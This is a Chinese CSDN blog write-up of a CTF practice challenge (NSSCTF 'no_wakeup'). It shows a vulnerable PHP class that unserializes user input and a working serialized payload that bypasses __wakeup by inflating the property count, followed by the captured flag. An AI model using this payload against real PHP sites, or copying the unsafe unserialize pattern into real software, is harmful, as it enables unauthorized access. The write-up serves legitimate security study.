CTF之反序列化练习

已于 2023-04-17 10:18:48 修改
阅读量171 收藏
点赞数
分类专栏: CTF题目笔记 文章标签: php web安全 安全 学习
于 2023-04-17 10:18:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhangAweio/article/details/130192651
版权

平台

在线靶场:主页 | NSSCTF

[SWPUCTF 2021 新生赛]no_wakeup

题目原型:

<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>

看到中间的我我们只需要构造 admin = admin passwd = wllm就可以得到flag

那我们就要构造php反序列化

class HaHaHa{
    public $admin="admin";
    public $passwd="wllm";
}
$a = new HaHaHa();
echo serialize($a);

但是这题输出的既然是

很显然是错的答案,那我们试着寻找里面的哪个 __wakeup()

那我们就用 __wakeup() 绕过的姿势,只要是成员大于原来的成员都可以绕过这个函数,不会优先执行,

O:6:%22HaHaHa%22:3:{s:5:%22admin%22;s:5:%22admin%22;s:6:%22passwd%22;s:4:%22wllm%22;}

NSSCTF{97ecea61-382a-4eb5-8fbc-691eb116faec}

Corrot_Pig
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF题目合集_网络安全ctf大赛题库,附详细答案
碧海朝天素
04-08 1342
/对字符串进行反转 如果是abc 那么就是 cba。X-Forwarded-For 尝试这个。将1改成2即可绕过wakeup功能。
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
纽约时报 移动团队 Objective-C 规范指南
03-06
这份规范指南概括了纽约时报 iOS 团队的代码约定。 介绍 关于这个编程语言的所有规范,如果这里没有写到,那就在苹果的文档里: Objective-C 编程语言 Cocoa 基本原理指南 Cocoa 编码指南 iOS 应用编程指南 目录 点语法 间距 条件判断 三目运算符 错误处理 方法 变量 命名 注释 Init 和 Dealloc 字面量 CGRect 函数 常量 枚举类型 位掩码 私有属性 图片命名 布尔 单例 导入 Xcode 工程 点语法 应该 始终 使用点语法来访问或者修改属性,访问其他实例时首选括号。 推荐: view.backgroundColor = UIColor.orangeColor; UIApplication.sharedApplication.delegate; 反对: [view setBackgroundColor:[UIColor orangeColor]]; [UIApplication sharedApplication].delegate; 间距 一个缩进使用 4 个空格,永远不要使用制表符(tab)缩进。请确保在 Xcode 中设置
laowang-hahaha-design_pattern-master.zip
06-04
用三种模式做一个系统,适合学上面用于大作业参考内容,放心的使用。
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
php代码-ctf payload 第九题 反序列化 do you know robot
NSSCTF[ZJCTF 2019]NiZhuanSiWei详解(超级无敌详细,伪协议,文件包含,反序列化)
weixin_66112047的博客
01-29 423
构造序列化去覆盖,获取flag
反序列化学习以及ctfsow_反序列化模块的练习
RealIiikun的博客
03-16 342
1.序列化:把对象转换为字节序列的过程,即把对象转换为可以存储或传输的数据的过程。例如将内存中的对象转换为二进制数据流或文件,在网络传输过程中,可以是字节或是XML等格式。2.反序列化:把字节序列恢复为对象的过程,即把可以存储或传输的数据转换为对象的过程。例如将二进制数据流或文件加载到内存中还原为对象。​ 对象序列化成的字节序列会包含对象的类型信息、对象的数据等,说白了就是包含了描述这个对象的所有信息,能根据这些信息“复刻”出一个和原来一模一样的对象。
记一道CTF中的phar反序列化
qq_53886354的博客
08-14 2306
通过config的值去控制文件读写, 审计一下正则发现基本上把伪协议都过滤了, 直接new getflag也不行,这种情况下十六进制类名也绕不了,再仔细审计一下发现虽然phar伪协议没有作限制。这一块实在是没什么思路去绕过, 于是参考了一下xenny和atao两位师傅的wp, 此处用的是xenny师傅的思路, 修改文件内容 -> 签名修复 -> 文件上传。, 大致原理就是用其他的压缩格式再对phar文件进行压缩达到混淆的效果, 部分压缩格式混淆过的phar内容同样可以直接被phar://伪协议解析。....
反序列化学习笔记【一文打通ctf中的反序列化题目】
jayq1的博客
07-21 3237
本文包含反序列化的各类题目,比如基础的php反序列化 反序列化字符逃逸 phar反序列化 Pickle反序列化 师傅们轻点喷~
CTF 反序列化入门例题wp
qq_47168481的博客
10-20 2562
最近有再看反序列化,尝试着学一下比赛中的反序列化: 源码: <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova;
攻防世界序列化问题详解.md
09-12
攻防世界,序列化问题
CTF反调试.exe
04-23
《由一道ctf引起的10种反调试的探究》所用的CTF试题。
CTF之二维码扫描.7z
12-02
CTF入门之二维码扫描神器,支持二维码修复
nssctf web 入门(3)
qq_61988806的博客
04-13 1130
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
如何使用宝塔面板搭建Tipask问答社区网站并发布公网远程访问
深入解析C/C++编程技巧,带你探索高效开发之路
05-29 800
我们的生活和工作中,碰到问题的时候通常都会到网上寻找答案,但网上寻找到的答案要么答非所问,要么全是广告,真正有价值的回答少之又少,这就让人很头疼。也正是这个痛点,催生了如“某乎”这样的问答平台,让我们能轻松快速的找到想要的答案。本文主要跟大家介绍,如何使用Cpolar+Tipask,在Ubuntu系统上搭建一个私人问答网站并实现随时随地远程访问本地站点,无需公网ip也不用购买域名服务器。Tipask网站从基本上看,实际与论坛网站很相似,因此在安装和部署上并没有太大的难度。
HackTheBox-Machines--Popcorn
七天
05-28 466
Popcorn 测试过程。
建WordPress主题官网模板
xiaoyuya
05-30 138
WordPress主题官网模板
centOS中安装docker-composer时报错的解决方法
最新发布
骨子里的偏爱
05-31 210
centOS中安装docker-composer时报错的解决方法
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHPWeb应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值